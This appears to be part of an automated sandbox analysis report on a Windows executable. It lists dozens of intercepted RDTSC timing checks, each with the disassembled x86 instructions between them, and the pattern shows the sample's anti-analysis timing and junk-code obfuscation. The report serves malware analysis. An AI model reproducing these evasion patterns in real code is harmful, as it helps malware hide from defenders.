                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD79B second address: 4CD7A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD7A2 second address: 4CD7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEC3D47h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2070 second address: 4D2077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2077 second address: 4D207C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D207C second address: 4D2084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DEACF second address: 4DEAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6E7 second address: 4DE6F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE6F5 second address: 4DE738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Ah 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F7E2CEC3D3Ah 0x00000011 jno 00007F7E2CEC3D51h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F7E2CEC3D36h 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE738 second address: 4DE73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20D0 second address: 4E20D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20D8 second address: 4E20EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7E2CEB1B16h 0x0000000a popad 0x0000000b jl 00007F7E2CEB1B1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20EB second address: 4E20EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E20EF second address: 4E210A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F7E2CEB1B21h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1D37 second address: 4E1D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D48h 0x00000007 jmp 00007F7E2CEC3D46h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CEC3D48h 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0591 second address: 4F05CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B24h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F7E2CEB1B2Fh 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F05CA second address: 4F05FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CEC3D43h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7E2CEC3D3Ch 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F24A1 second address: 4F24A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC73D second address: 4FC743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC743 second address: 4FC747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB79A second address: 4FB7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB7A0 second address: 4FB7A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50232E second address: 502342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jp 00007F7E2CEC3D36h 0x0000000c jbe 00007F7E2CEC3D36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50205F second address: 502063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5205E8 second address: 5205ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53882E second address: 538841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538841 second address: 538846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538846 second address: 53884C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390C3 second address: 5390CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53AAB9 second address: 53AAC3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E2CEB1B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D39D second address: 53D3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D3A1 second address: 53D3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D481 second address: 53D486 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D675 second address: 53D6D8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CEB1B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7E2CEB1B28h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F7E2CEB1B18h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d push 00000004h 0x0000002f jng 00007F7E2CEB1B1Ch 0x00000035 mov edx, dword ptr [ebp+122D2756h] 0x0000003b call 00007F7E2CEB1B19h 0x00000040 push esi 0x00000041 push eax 0x00000042 push edx 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D6D8 second address: 53D701 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7E2CEC3D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c jp 00007F7E2CEC3D44h 0x00000012 push ebx 0x00000013 jmp 00007F7E2CEC3D3Ch 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D701 second address: 53D706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D706 second address: 53D70C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D70C second address: 53D722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F7E2CEB1B16h 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DA04 second address: 53DA2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pushad 0x00000013 js 00007F7E2CEC3D36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DA2E second address: 53DA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEB1B23h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DA4F second address: 53DA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DA53 second address: 53DA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F22D second address: 53F233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EDC3 second address: 53EDC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30047 second address: 4A3004D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3004D second address: 4A300A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F7E2CEB1B1Bh 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F7E2CEB1B29h 0x0000001c adc ah, FFFFFFA6h 0x0000001f jmp 00007F7E2CEB1B21h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300A7 second address: 4A300D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7E2CEC3D48h 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300D9 second address: 4A300DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A300DD second address: 4A300E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ED8 second address: 4A10EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EDC second address: 4A10F58 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7E2CEC3D3Ch 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f pushfd 0x00000010 jmp 00007F7E2CEC3D3Ah 0x00000015 or cx, 0D88h 0x0000001a jmp 00007F7E2CEC3D3Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 jmp 00007F7E2CEC3D44h 0x00000028 mov ax, 0601h 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f jmp 00007F7E2CEC3D3Ch 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ecx, edx 0x0000003a jmp 00007F7E2CEC3D49h 0x0000003f popad 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F58 second address: 4A10F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEB1B1Ch 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50F49 second address: 4A50F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CEC3D3Ch 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50F59 second address: 4A50F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7E2CEB1B23h 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50F77 second address: 4A50FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F7E2CEC3D3Bh 0x0000000b sub cx, 546Eh 0x00000010 jmp 00007F7E2CEC3D49h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50FB3 second address: 4A50FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50FB9 second address: 4A50FBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50FBF second address: 4A50FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0180 second address: 49F0184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0184 second address: 49F018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C0F second address: 4A10C15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C15 second address: 4A10C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C1B second address: 4A10C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C1F second address: 4A10C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7E2CEB1B22h 0x00000010 xor esi, 54F4B2C8h 0x00000016 jmp 00007F7E2CEB1B1Bh 0x0000001b popfd 0x0000001c mov ebx, ecx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F7E2CEB1B25h 0x00000025 xchg eax, ebp 0x00000026 jmp 00007F7E2CEB1B1Eh 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C7D second address: 4A10C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C81 second address: 4A10C92 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov cl, 83h 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C92 second address: 4A10C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C96 second address: 4A10C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1078C second address: 4A1080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F7E2CEC3D44h 0x0000000e push eax 0x0000000f jmp 00007F7E2CEC3D3Bh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov ax, 24DBh 0x0000001a mov edx, esi 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f jmp 00007F7E2CEC3D3Ah 0x00000024 pop ebp 0x00000025 pushad 0x00000026 push ecx 0x00000027 pushfd 0x00000028 jmp 00007F7E2CEC3D3Dh 0x0000002d sbb cx, 1C16h 0x00000032 jmp 00007F7E2CEC3D41h 0x00000037 popfd 0x00000038 pop eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F7E2CEC3D47h 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10666 second address: 4A1068A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEB1B1Ch 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1068A second address: 4A10690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10690 second address: 4A1069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1069F second address: 4A106A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106A3 second address: 4A106B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106B5 second address: 4A10702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A6B4h 0x00000007 pushfd 0x00000008 jmp 00007F7E2CEC3D3Dh 0x0000000d adc si, 9276h 0x00000012 jmp 00007F7E2CEC3D41h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7E2CEC3D49h 0x00000025 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10702 second address: 4A1074C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7E2CEB1B20h 0x00000008 sub ax, 11F8h 0x0000000d jmp 00007F7E2CEB1B1Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7E2CEB1B1Eh 0x00000020 add ch, 00000058h 0x00000023 jmp 00007F7E2CEB1B1Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10408 second address: 4A1042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D45h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1042F second address: 4A1046A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov ecx, 0AC7F78Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F7E2CEB1B22h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7E2CEB1B27h 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20330 second address: 4A2035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7E2CEC3D3Ch 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2035C second address: 4A203DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEB1B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7E2CEB1B24h 0x00000011 or ax, 4678h 0x00000016 jmp 00007F7E2CEB1B1Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d movsx edx, ax 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F7E2CEB1B1Dh 0x0000002b or ah, 00000016h 0x0000002e jmp 00007F7E2CEB1B21h 0x00000033 popfd 0x00000034 mov di, si 0x00000037 popad 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F7E2CEB1B29h 0x00000040 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203DF second address: 4A203E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A203E5 second address: 4A203E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A303FE second address: 4A304A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CEC3D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7E2CEC3D44h 0x00000013 or esi, 25CB2BB8h 0x00000019 jmp 00007F7E2CEC3D3Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F7E2CEC3D48h 0x00000025 xor esi, 1206E618h 0x0000002b jmp 00007F7E2CEC3D3Bh 0x00000030 popfd 0x00000031 popad 0x00000032 and dword ptr [eax], 00000000h 0x00000035 jmp 00007F7E2CEC3D46h 0x0000003a and dword ptr [eax+04h], 00000000h 0x0000003e jmp 00007F7E2CEC3D40h 0x00000043 pop ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F7E2CEC3D3Ah 0x0000004d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A304A0 second address: 4A304A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
